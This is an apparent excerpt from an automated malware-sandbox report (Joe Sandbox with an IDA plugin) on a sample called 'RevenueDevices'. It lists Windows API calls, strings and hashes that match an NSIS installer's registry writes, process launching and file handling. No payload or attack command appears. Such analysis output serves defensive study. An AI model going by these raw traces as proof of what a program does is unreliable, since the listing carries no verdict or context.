                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                          • SendMessageW.USER32(00000000), ref: 00404251
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                          • SetCursor.USER32(00000000), ref: 004042D2
                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                          • SetCursor.USER32(00000000), ref: 004042F6
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                          • String ID: @%F$N$open
                                          • API String ID: 3928313111-3849437375
                                          APIs
                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                          Similarity
                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                          • String ID: 82D$@%F$@rD$A
                                          • API String ID: 3347642858-1086125096
                                          APIs
                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                          • wsprintfA.USER32 ref: 00406B4D
                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                          • String ID: F$%s=%s$NUL$[Rename]
                                          • API String ID: 565278875-1653569448
                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                          • DeleteObject.GDI32(?), ref: 004010F6
                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                          • DeleteObject.GDI32(?), ref: 0040116E
                                          • EndPaint.USER32(?,?), ref: 00401177
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                          APIs
                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 3581403547-784952888
                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                          • API String ID: 1641139501-220328614
                                          • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                          • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                          Strings
                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID: created uninstaller: %d, "%s"
                                          • API String ID: 3294113728-3145124454
                                          • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                          • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                          APIs
                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3734993849-2769509956
                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                          • GetSysColor.USER32(?), ref: 00403E2B
                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                          • DeleteObject.GDI32(?), ref: 00403E55
                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                          Strings
                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                          • API String ID: 1033533793-945480824
                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                          Strings
                                          • Exec: command="%s", xrefs: 00402241
                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                          • Exec: success ("%s"), xrefs: 00402263
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                          • API String ID: 2014279497-3433828417
                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                          • GetMessagePos.USER32 ref: 00404871
                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
